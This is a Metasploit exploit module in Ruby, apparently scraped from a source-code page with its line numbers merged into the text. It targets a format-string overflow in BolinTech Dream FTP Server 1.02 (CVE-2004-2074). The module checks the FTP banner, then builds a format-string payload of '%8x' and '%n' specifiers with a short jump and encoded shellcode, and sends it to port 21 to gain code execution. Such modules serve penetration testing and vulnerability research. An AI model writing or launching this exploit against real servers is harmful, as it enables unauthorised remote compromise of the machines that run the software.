Path: blob/master/modules/exploits/windows/ftp/dreamftp_format.rb
19592 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = GoodRanking78include Msf::Exploit::Remote::Tcp910def initialize(info = {})11super(12update_info(13info,14'Name' => 'BolinTech Dream FTP Server 1.02 Format String',15'Description' => %q{16This module exploits a format string overflow in the BolinTech17Dream FTP Server version 1.02. Based on the exploit by SkyLined.18},19'Author' => [ 'aushack' ],20'Arch' => [ ARCH_X86 ],21'License' => MSF_LICENSE,22'References' => [23[ 'CVE', '2004-2074'],24[ 'OSVDB', '4986'],25[ 'BID', '9800'],26[ 'EDB', '823']27],28'Platform' => ['win'],29'Privileged' => false,30'Payload' => {31'Space' => 1000,32'BadChars' => "\x00\x0a\x0d",33'StackAdjustment' => -3500,34},35'Targets' => [36# Patrick - Tested OK 2007/09/10 against w2ksp0, w2ksp4 en.37[38'Dream FTP Server v1.02 Universal',39{40'Offset' => 3957680, # 0x3c63ff-0x4f41}42],43],44'DisclosureDate' => '2004-03-03',45'DefaultTarget' => 0,46'Notes' => {47'Reliability' => UNKNOWN_RELIABILITY,48'Stability' => UNKNOWN_STABILITY,49'SideEffects' => UNKNOWN_SIDE_EFFECTS50}51)52)5354register_options(55[56Opt::RPORT(21),57]58)59end6061def check62connect63banner = sock.get_once64disconnect65if (banner.to_s =~ /Dream FTP Server/)66return Exploit::CheckCode::Detected67end6869return Exploit::CheckCode::Safe70end7172def exploit73connect74select(nil, nil, nil, 0.25)75sploit = "\xeb\x29"76sploit << "%8x%8x%8x%8x%8x%8x%8x%8x%" + target['Offset'].to_s + "d%n%n"77sploit << "@@@@@@@@" + payload.encoded78sock.put(sploit + "\r\n")79select(nil, nil, nil, 0.25)80handler81disconnect82end83end848586